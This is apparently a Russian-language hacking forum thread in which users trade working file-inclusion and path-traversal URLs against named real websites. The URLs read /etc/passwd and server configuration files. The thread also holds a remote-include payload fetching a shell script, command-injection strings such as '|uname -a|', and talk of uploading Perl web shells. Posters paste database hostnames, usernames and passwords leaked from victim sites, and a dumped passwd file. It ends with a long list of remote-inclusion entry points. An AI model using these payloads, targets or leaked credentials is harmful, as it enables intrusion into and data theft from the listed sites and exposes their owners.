http://www.kiva.org/app.php?page=../../../../../../../../../../etc/hosts%00
http://www.kiva.org/app.php?page=../../../../../../../../../../etc/my.cnf%00
http://www.kiva.org/app.php?page=../../../../../../../../../../etc/syslog.conf%00
http://www.kiva.org/app.php?page=../../../../../../../../../../etc/services%00
http://www.kiva.org/app.php?page=../../../../../../../../../../etc/group%00
http://www.kiva.org/app.php?page=../../../../../../../../../../etc/profile%00
http://www.kiva.org/app.php?page=../../../../../../../../../../etc/bashrc%00
http://www.kiva.org/app.php?page=../../../../../../../../../../etc/skel/.bashrc%00
http://www.kiva.org/app.php?page=../../../../../../../../../../etc/httpd/conf/httpd.conf%00

myphpbb.com.ru
http://myphpbb.com.ru/?q=sinc/sconfig.dat&c=include('http://www.ru/shell.txt');die();

http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/hosts
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/passwd
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/services
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/group
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/profile
http://www.mcxapc.org/static.php?file=../../../../../../../../../../../etc/skel/.bashrc

http://photos.gavintech.com выводится оформленно, приятно читать
http://photos.gavintech.com/source.php?file=../../../../../../../../../../etc/passwd&show=true
http://photos.gavintech.com/source.php?file=../../../../../../../../../../etc/hosts&show=true
http://photos.gavintech.com/source.php?file=../../../../../../../../../../etc/syslog.conf&show=true
http://photos.gavintech.com/source.php?file=../../../../../../../../../../etc/services&show=true
http://photos.gavintech.com/source.php?file=../../../../../../../../../../etc/group&show=true
http://photos.gavintech.com/source.php?file=../../../../../../../../../../etc/profile&show=true
http://photos.gavintech.com/source.php?file=../../../../../../../../../../etc/skel/.bashrc&show=true
http://photos.gavintech.com/source.php?file=../../../../../../../../../../etc/php.ini&show=true

http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/passwd
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/hosts
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/services
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/syslog.conf
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/group
http://www.salsalovers.lv/index.php?page=../../../../../../../../../../../etc/profile

http://www.verwirrend.de/
http://www.verwirrend.de/showsource.php?file=../../../../../../../../../../etc/passwd

usina.com

http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/passwd
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/skel/.bashrc
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/bashrc
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/profile
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/group
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/syslog.conf
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/services
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/hosts
http://usina.com/bem-te-vi/source_view.php?file=../../../../../../../../../../../etc/my.cnf

bteb-bd.org
читалкой удалось достать инфу о бд
$host = "mysql229.secureserver.net";
$dbusername = "btebonline";
$dbpassword = "btebreg";
$dbname = "btebonline";
и

http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/passwd
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/hosts
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/services
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/syslog.conf
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/group
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/profile
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/inputrc
http://bteb-bd.org/dip2006/index.php?file=../../../../../../../../../../../etc/bashrc

;)

http://www.bnieast.com/cgi-bin/db.pl?h=../../../../../../etc/passwd%00

http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/passwd
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/my.cnf
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/hosts
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/services
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/syslog.conf
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/group
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/profile
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/inputrc
http://www.clfns.com/news/file.php?file=../../../../../../../../../../../etc/skel/.bashrc

+
акки админов от сайта
http://www.clfns.com/news/file.php?file=../../data/users.db.php

http://www.phaneuf.net/newsletter/newsletter_list.cgi?action=single&p=&filename=|uname -a|&title=&titlefile=|id|
=\

http://www.mscorecard.com/mscorecard/getfile.php?file=../../../../../../../../../../../etc/passwd
база

( $db = mysql_connect("mysql3.nebula.fi", "velocor", "2xAaQf7M") or die ("Error connecting to database.");
mysql_select_db("velocor", $db) or die ("Error connecting to database.");
)

http://2010.cshl.edu/scripts/main2.pl?link=project&content=|uname -a|
тут вроде нет папок на запись =)
http://dev.eurac.edu:8080/cgi-bin/index/info.pl?fname=|find$IFS/home/ostreiter/local/apache/$IFS-perm$IFS-2$IFS-ls|
тут папки есть, можно поробовать залить перловый шелл =\

=\\


http://dblife.cs.wisc.edu/markUpDBWorld.cgi?fileName=../../../../../../../../../../etc/passwd%00

http://www.ph3.org/fdload.php?file=../../../../../../../../../../../etc/passwd
м база )
($storeConfig['type'] = 'mysqlt';
$storeConfig['hostname'] = 'localhost';
$storeConfig['database'] = 'ph3org_gallery';
$storeConfig['username'] = 'ph3org_onsec';
$storeConfig['password'] = '4x4pajer0';
$storeConfig['tablePrefix'] = 'g2_';
$storeConfig['columnPrefix'] = 'g_';)

http://dev.eurac.edu:8080/cgi-bin/index/info.pl?fname=|find$IFS/home/ostreiter/local/apache/$IFS-perm$IFS-2$IFS-ls|

У меня эта ссылка в личке уже с ноября того года :) Сколько я не трахался с ней, так и не залил...

я посмотрел, в той папке где лежит скрипт info.pl уже есть залитые перловые шеллы, только когда пытаешься их выполнить, вылетает service temporary unavailable

http://www.usc2008.uw.edu.pl/index.php?display=../../../../../../../etc/passwd%00
http://www.sobral.ce.gov.br/comunicacao/novo2/index.php?pagina=cidade/index.php?pagina=/../../../../../../../../etc/passwd
http://warszawa.ws/?idd=/etc/passwd
http://www.zss.tarnow.pl/aktualnosci/full.php?plik=/etc/passwd
http://www.womczest.edu.pl/rodn/default.php?main=forum&sub=kwartalnik&info=roczniki&nr=200409&tr=../../../../../etc/passwd
https://sklep.pkn.pl/?m=help&a=topic&id=../../../../../../../../etc/passwd%00
http://wms.mat.agh.edu.pl/~cichacz/beczka.php?plan=../../../../../etc/passwd
http://www.russian-inok.org/books/nachalnik/page.php?page=../../../../../../../../etc/passwd
http://www.dancerzine.com/tmpl.php?page=../../../../../../../../../../../../../etc/passwd
http://www.zdmikp.bydgoszcz.pl/index.php?id=../../../../../../../etc/passwd%00
http://minipc.org/safepup/index.php?file=../../../../../../../../../../../../../../etc/passwd
http://www.najogada.com.br/novo/?pg=../../../../../../../../../../../../../etc/passwd%00
http://ruraldev.maharashtra.gov.in/marathi/dcmNew/news/popupNewsShow.php?file=../../../../../../../../../etc/passwd
http://www.sierrachart.com/index.php?file=../../../../../../../../../../../../../../etc/passwd
http://www.photoshots.pl/site/index.php?file=/etc/passwd
http://regalcityonline.com/index.php?page=../../../../../../../../../../../../../etc/passwd%00
http://www.gerek.sk/reader.php?openfile=/etc/passwd
http://smarteducation.pl/demo.php?file=etc/passwd
http://www.crawf.com.pl/index.php?file=../../../../../etc/passwd
http://www.kiva.org/app.php?page=../../../../../../../../etc/passwd%00
http://www.linhadefrente.com.br/index.php?var=/../../../../../../../../etc/passwd
http://www.cieos.com/en/index.php?path=../../../../../etc/passwd
http://www.czerniejewo.pl/index.php?page=../../../../../../../../../../../etc/passwd
http://www.hndkorea.com/board.php?incfile=../../../../../etc/passwd
http://www.ecomstation.it/ecsoft2/index.php?language=../../../../../../../../../../../../../../etc/passwd
http://www.krakowglobe.co.uk//index.php?f=../../../../../../../../../../etc/passwd
http://www.heritagewoodland.co.uk//index.php?f=../../../../../../../../../../etc/passwd
http://www.oil-price.net/index.php?lang=../../../../../../../../../../../../../../etc/passwd%00
http://www.zaproszenia-slubne.com/printmedia/index.php?tresc=miniaturki.php&katalog=/etc/passwd
http://cdeam.ufam.edu.br/eficiencia/eficiencia.php?page=../../../../../../../../../etc/passwd
http://www.kolkovna.cz/index.php?language=../../../../../../../../../../../../../../etc/passwd%00
http://www.ascot.pl/index.php?lang=../../../../../../../../../../../../../../etc/passwd%00
http://fcs.maharashtra.gov.in/marathi/dcmNew/news/popupNewsShow.php?file=../../../../../../../../../etc/passwd
http://www.centrum-parkietowe.pl/_dodruku.php5?incfile=/etc/passwd
http://www.mitschka.eu/index.php?page=./../../../../../../../../../../../etc/passwd
http://www.weeblackskelf.co.uk/label/main.php?x=artists&y=../../../../../etc/passwd
http://galerie.superfoto.pl/static.php?static=./../../../../../../../../../etc/passwd%00&sid=MyID484b9c2fafa10
http://www.thelinkpage.co.uk/index.php?f=/../../../../../../../etc/passwd
http://papier.sklep.pl/_dodruku.php?incfile=/etc/passwd
http://www.hcc.vic.edu.au/templates/content.php?incfile=./../../../../../../../../../etc/passwd
http://romek.intermania.pl/pasieka24/_dodruku.php?incfile=/etc/passwd
http://www.diabetes-india.com/template1.php?incfile=./../../../../../../../../../etc/passwd
http://centrumvolvo.pl/pl/stronka.php?id=/etc/passwd
http://www.accessampn.com/cgi-bin/AMPNtemplate.cgi?incfile=./../../../../../../../../../etc/passwd
http://www.ksiazkiknk.pl/index.php?site=/etc/passwd
http://www.hlyb.net/board.html?incfile=./../../../../../../../../../../../../etc/passwd
http://www.kettlefoods.co.uk/site/HomePage.do?id=./../../../../../../../../../../etc/passwd
http://www.seeyou.co.jp/pets/subpage.php?incfile=./../../../../../../../../../etc/passwd
http://www.rachelpopowcer.com/main.php?x=../../../etc/passwd
http://2edo.com/cgi-bin/eStore/index.cgi?page=../../../../../../../../etc/passwd
http://www.softworld.pl/mp3/?download=../../../../../../../etc/passwd
http://www.studiosupra.pl/index.php?str=cokolwiek
http://www.kusat.com/go.php?path=/../../../../../../etc/passwd
http://www.magicalexperience.co.uk//index.php?f=../../../../../../../../../../etc/passwd
http://www.guitaremporium.co.uk//index.php?f=../../../../../../../../../../etc/passwd
http://www.interspeech2005.org/technical//index.php?f=../../../../../../../../../../etc/passwd
http://www.fluxplay.co.uk//index.php?f=../../../../../../../../../../etc/passwd
http://www.thewinedetective.co.uk//index.php?f=../../../../../../../../../../etc/passwd
http://www.tugofwar.co.uk//index.php?f=../../../../../../../../../../etc/passwd
http://www.hljbsm.gov.cn//index.jsp?id=../../../../../../../../../../etc/passwd
http://www.vortex.org.uk//index.php?f=../../../../../../../../../../etc/passwd
http://www.lyson.com.pl/empty.php?incfile=/etc/passwd
http://www.omnet.com/main.jsp?splsh=4&incfile=../etc/passwd
http://www.artel.agdex.com/index.php?open=/etc/passwd
http://www.fanello.ch/index.php?page=./../../../../../../../../../../../etc/passwd
http://www.cimav.edu.mx/oferta.php?load=../../../../../etc/passwd
http://www.waszewesele.pl/index2.php?tresc=/../../../etc/passwd
http://www.artel.agdex.com/index.php?open=/etc/passwd
http://psychotronika.info/open.php?page=../../../../../../../etc/passwd
http://www.crawf.com.pl/index.php?file=/etc/passwd
http://www.allprof.com.pl/beautyimage/index.php?content=../../../../../../../../etc/passwd&id=44
http://www.rennsportnews.de/index.php?load=/etc/passwd
http://www.dogs-abc.de/index.php?filename=/etc/passwd
http://www.piedmontsoccer.org/inde.php?cont=/etc/passwd
http://www.zaproszenia.com/slub/main.php?link=LFI
http://www.rennsportnews.de/index.php?load=/etc/passwd
http://www.belchatow.sr.gov.pl/index.php?id=[LFI]
http://www.santaclauslive.com/main.php?link=LOCAL_FILE_INCLUDE&pid=2&kieli=eng
http://www.riversideeurope.com/lang_p/index.php?page=[LFI]
http://www.fox-foto.com/index.php?strona=../../../../../../../etc/passwd
http://www.reverie.dreamhost.com/index.php?file_name[]=/etc/passwd
http://uplynnienia.eu/index.php?id=/etc/passwd
http://www.opussoft.com.pl/?f=/etc/passwd
http://www.andrewsmithresearch.co.uk//index.php?f=../../../../../../../../../../etc/passwd
http://www.egir.dk/index.php?page=/etc/passwd
http://www.ekonto.net.pl/?id=[local%20include]
http://www.oepu.at/cms/cms/index.php?page=./../../../../../../../../../../../etc/passwd
http://programy.ilife.pl/index.php?download=/etc/passwd
http://www.ranking.pl/index.php?page=AnalizyPage&zone=3&stat=zmiana_metody08&p=/../../../../../../etc/passwd%00
http://www.saladillo.gov.ar/index.php?include=admin/.passwd

http://1-bt.ru/spravka.php?s=../../../../../../etc/passwd%00

:)

Serbia

http://www.b92.net:80/forcedl.php?file=../../../../../../../../../../../../../etc/passwd
http://www.b92.net:80/forcedl.php?file=../../../../../../../../../../../../../usr/local/apache2/conf/httpd.conf


Russia

http://letitbit.net:80/?vote_cr=../../../../../../../../etc/passwd%00

http://www.allsidige.no/elementer.php?file=[INCLUDE]
http://www.cdb.com.kh/index.php?url=[INCLUDE]
http://www.elma.se/index.php?url=[INCLUDE]
http://www.pqfilm.ru/head.php?id=23&file=[INCLUDE]

_http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f=../

http://www.indianstudios.net/rotterdamfilmfestival.php?id=[INCLUDE]
Вот вроде иньекция.

Вот вроде иньекция.


нету иньекции тут мистер

www.iauneka.ac.ir
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/passwd
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/hosts
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/services
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/group
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/profile
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/inputrc
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/bashrc
http://www.iauneka.ac.ir/download.php?file=../../../../../../../../../../../etc/skel/.bashrc

_http://www.postnuke.ru/index.php?module=Static_Docs&type=user&func=view&f=../
А лучше сюда и шела ненадо полный рут :cool:
http://www.postnuke.ru/index.php?module=Static_Docs&func=view&f=../../../../../../../../../../../../../../

http://www.kasseler-cms.net/index.php?module=phpManual&file=../../../../../../../../../../../etc/passwd

PR 5
http://www.socialweb.be/nl/archieven/index.php?File=../../../../../../../../../../../etc/passwd%00

http://www.serviceformulaire.fr/html/menu.phtml?page=[INCLUDE]
http://iron-brigade.org/btech/html/page.php?fichier=[INCLUDE]
http://bagowei.free.fr/_php/contener.php?path=..%2F..%2F&file=[INCLUDE]&title=Bagoweiremote including

под сотню юзеров , а каждый юзер, возможно - "сайт"
только толку...
а толк от инклуда есть... можно читать файлы.. следовательно можно читать конфиги.. отсюда моожно получить путь до домашних каталогов этих сайтов, потом поискать дыры и в конце концов залить на это чертов сервер шел... а там уже твори что твой душе угодно=)

1) http://www.ejls.eu/download.php?file=../etc/passwd

root:x:0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
Сколько не мучался пути к конфигам ненашел, пути брал отсюда:
https://forum.antichat.ru/thread49775.html

2) http://www.jff.org/download.php?file=../index.php
$hostname_JFF = "localhost";
$database_JFF = "jff_content";
$username_JFF = "jff_contentReade";
$password_JFF = "^&%623kjlfsdf_$43";
и
<?php
function connectToDatabase() {
$dbh=mysql_connect ("localhost", "helpuc_helpuc2hu", "xd1iqXSO9m")
or die ('I cannot connect to the database because: ' . mysql_error());
mysql_select_db ("helpuc_helpuc2helpuconnect");
}
function query ($sql)
{
$query_result=mysql_query($sql) or die("Couldn't execute following query:<b>".$sql."</b> because of".mysql_error());
if (!$query_result) return (0);
$out=array();
// if (mysql_num_rows($query_result)>1) {
while ($value=@mysql_fetch_array($query_result,MYSQL_ASS OC)) $out[]=$value;
//} else $out=@mysql_fetch_array($query_result,MYSQL_ASSOC) ;
if (count ($out)>=1) return ($out);else return $query_result;
}
?>

fyidirectoriesofamerica.com

http://www.fyidirectoriesofamerica.com/index.php?page=../../../../../../../../etc/passwd


www.imperialhoods.com PR 4 ;)

http://www.imperialhoods.com/index.php?module=company_info&page=../../../../../etc/passwd


www.planetjerry.com

http://www.planetjerry.com/index.php?page=../../../../../../../etc/passwd&qn=2

http://pocash.net/pocash.php?page=./../../../etc/passwd

из моего архива:
http://jkt1.detiknews.com/indexfr.php?url=
http://jkt1.detikfinance.com/index.php?url=
http://www.nowa.cc/showthread.php?p=1202064/forum.php?act=
http://www.yoursitebasis.com/components/com_performs/performs.php?mosConfig_absolute_path=
http://www.a40.de/component/option,com_comprofiler/task,registers/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=
http://www.specialevoertuigen.nl//components/com_remository/admin.remository.php?mosConfig_absolute_path=
http://www.glopeda.com/replaytv//mygallery/myfunctions/mygallerybrowser.php?myPath=
http://www.business.com/popular/_pop3//plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=
http://www.business.com/popular/_pop3//plugins/BackUp/Archive.php?bkpwp_plugin_path=
http://www.elpodencoandaluz.com/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=
http://www.elpodenquero.com/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=
http://ramdel.codesys.org/blog//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=
http://www.glopeda.com//wp-content/plugins/wordtube/wordtube-button.php?wpPATH=
http://www.glopeda.com/index.htm//wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=
http://www.wing21.rtaf.mi.th/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=
http://www.calasanciohispalense.org//components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=
http://so.7walker.net/index.php?site=
http://www.business.com/popular//popup_window.php?site_isp_root=
http://www.moritagroup.com.br/main.php?tela=
http://www.cog.org.gt/index.php?page=
http://www.bioscience.co.th/index.php?option=
http://www.lemat.priv.pl/index.php?m=page&pg_id=106/index.php?id=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/administrator/components/com_webring/admin.webring.docs.php?component_dir=
http://www.xshqiptaretx.org/index.php?loc=
http://www.naval-acad.bg/cgi-bin/awstats.pl/awstats.pl?output=errors404%E2%8C%A9=es/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/administrator/components/com_webring/admin.webring.docs.php?component_dir=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/administrator/components/com_webring/admin.webring.docs.php?component_dir=
http://lupoland.homeip.net/cgi-bin/awstats.pl?output=errors404%E2%8C%A9=nl%E2%8C%A9=e n//components/com_cpg/cpg.php?mosConfig_absolute_path=
http://sundaymag.ca/index.php?section=Article&limit=1000&rss=1/index.php?template=
http://www.xshqiptaretx.org/SHELLZ.php/big.php?pathtotemplate=
http://lupoland.homeip.net/cgi-bin/awstats.pl?output=errors404%E2%8C%A9=nl%E2%8C%A9=e n//components/com_cpg/cpg.php?mosConfig_absolute_path=
http://ns.naval-acad.bg/cgi-bin/awstats.pl?lang=de&output=errors404/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
http://www.nutribiotic.com/wwwstat.html//components/com_cpg/cpg.php?mosConfig_absolute_path=
http://www.grindaguy.com/administrator/components/com_webring/admin.webring.docs.php?component_dir=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
http://www.nutribiotic.com/wwwstat.html/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
http://ns.naval-acad.bg/cgi-bin/awstats.pl?lang=de&output=errors404/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=
http://704001.com/cgi-bin/webaccess.cgi//components/com_facileforms/facileforms.frame.php?ff_compath=
http://www.xshqiptaretx.org/index.php?kobr=
http://www.poets.org/index.php?template=
http://www.xshqiptaretx.org/index.php?kobr=
http://www.xshqiptaretx.org/index.php?kobr=
http://mindlessselfindulgence.com/board/index.php?file=
http://www.bombeiros.pa.gov.br/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=15( 7P14Roxy-7s14X7 Љ15)? 14::.
http://www.thebobs.com/index.php?l=pt/index.php?l=
http://www.eurosocialfiscal.org/index.php/principal/contacto/idmenu/index.php?principal=
http://www.thebobs.com/index.php?l=pt/index.php?l=
http://www.xshqiptaretx.org/index.php?langc=
http://www.xshqiptaretx.org/index.php?langc=
http://www.mvfd-ems.org/calendar//tools/send_reminders.php?noSet=0&includedir=
http://atzchaim.chadiscrafts.com/calendar//tools/send_reminders.php?noSet=0&includedir=
http://www.xshqiptaretx.org/index.php?rage=
http://www.xshqiptaretx.org/index.php?rage=
http://www.xshqiptaretx.org/index.php?rage=
http://www.xshqiptaretx.org/index.php?rage=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?rage=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?nic=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?rage=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?rage=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?nic=
http://forum.doityourself.com/index.php?nic=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?nic=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?arquivo=

http://www.raiseyourpulse.com/reports/log.files.html/index.php?arquivo=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?rage=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?arquivo=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?nic=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?rage=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?rage=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?arquivo=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?nic=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?arquivo=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?arquivo=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?nic=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?nic=
http://www.backupzone.org/stats/awstats.pl?output=errors404/index.php?rage=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?nic=
http://www.backupzone.org/stats/awstats.pl?output=errors404/index.php?rage=
http://www.infernet-x.com/index.php?rage=
http://percherie.free.fr/kietu/?kie_action=pages&kie_tri=p...l&kie_champ=0&kie_sens=up/index.php?x=
http://www.gymzv.sk/~aladar/vypis_statis.php/index.php?x=
http://percherie.free.fr/kietu/?kie_action=pages&kie_tri=p...l&kie_champ=0&kie_sens=up/index.php?x=
http://www.infernet-x.com/index.php?rage=
http://www.backupzone.org/stats/awstats.pl?output=errors404/index.php?rage=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?x=
http://www.control.com.co/estadisticas/zoek.php/index.php?x=
http://www.infernet-x.com/index.php?rage=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?nic=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?nic=
http://percherie.free.fr/kietu/?kie_action=pages&kie_tri=p...l&kie_champ=0&kie_sens=up/index.php?x=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?x=
http://www.infernet-x.com/index.php?arquivo=
http://www.infernet-x.com/index.php?arquivo=
http://percherie.free.fr/kietu/?kie_action=pages&kie_tri=p...l&kie_champ=0&kie_sens=up/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?rage=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/index.php?nic=
http://www.infernet-x.com/index.php?arquivo=
http://www.orientaredstgonorte.cl/estadisticas/full.php/tools/user.php/index.php?arquivo=
http://www.gymzv.sk/~aladar/vypis_statis.php/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/index.php?nic=
http://www.infernet-x.com/index.php?nic=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/index.php?nic=
http://www.gymzv.sk/~aladar/vypis_statis.php/index.php?x=
http://www.control.com.co/estadisticas/full.php/index.php?x=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/index.php?nic=
http://www.aquaprek.ru/eng_version/index.php?inc=
http://www.gymzv.sk/~aladar/vypis_statis.php/index.php?x=
http://www.infernet-x.com/index.php?nic=
http://www.control.com.co/estadisticas/full.php/index.php?x=
http://www.infernet-x.com/index.php?nic=
http://www.orientaredstgonorte.cl/estadisticas/full.php/index.php?x=
http://www.control.com.co/estadisticas/full.php/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/index.php?x=
http://www.orientaredstgonorte.cl/estadisticas/full.php/index.php?x=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?arquivo=
http://www.vaccinazione.it/cgi-bin/awstats.pl?output=notfounderror/index.php?arquivo=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/index.php?x=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/index.php?x=
http://www.totalna.webd.pl/istat/index.php?p=pages&PHPSESS...f3c7e83ac041e206abe22ac3e/index.php?x=
http://www.xshqiptaretx.org/strings.php/index.php?x=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?rage=
http://www.infernet-x.com/index.php?arquivo=
http://www.backupzone.org/stats/awstats.pl?lang=fr&output=errors404/index.php?rage=
http://www.infernet-x.com/index.php?rage=
http://www.raiseyourpulse.com/reports/log.files.html/index.php?nic=
http://www.vaccinazione.it/cgi-bin/awstats.pl?output=notfounderror/index.php?nic=
http://www.infernet-x.com/index.php?nic=
http://www.infernet-x.com/index.php?x=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=nl&output=notfounderror&update=1/index.php?x=
http://www.xshqiptaretx.org/strings.php//functions.php?include_path=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror/htmltonuke.php?filnavn=
http://okuyama.mt.tama.hosei.ac.jp/etc/virus.html/htmltonuke.php?filnavn=
http://www.xshqiptaretx.org/strings.php/htmltonuke.php?filnavn=
http://lupoland.homeip.net/cgi-bin/awstats.pl?output=errors404%E2%8C%A9=nl//modules/TotalCalendar/about.php?inc_dir=
http://www.xshqiptaretx.org/SHELLZ.php/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=
http://www.control.com.co/estadisticas/full.php//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=
http://www.vaccinazione.it/cgi-bin/awstats.pl?output=notfounderror%E2%8C%A9=en//ws/login.php?noSet=0&includedir=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror&update=1//xoopsgallery/init_basic.php?GALLERY_BASEDIR=
http://www.backupzone.org/stats/awstats.pl?output=errors404//xoopsgallery/init_basic.php?GALLERY_BASEDIR=
http://lupoland.homeip.net/cgi-bin/awstats.pl?output=errors404%E2%8C%A9=nl//xoopsgallery/init_basic.php?GALLERY_BASEDIR=
http://www.vaccinazione.it/cgi-bin/awstats.pl?lang=en&output=notfounderror&update=1/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=
http://www.gymzv.sk/~aladar/vypis_statis.php/administrator/components/com_jcs/view/register.php?mosConfig_absolute_path=
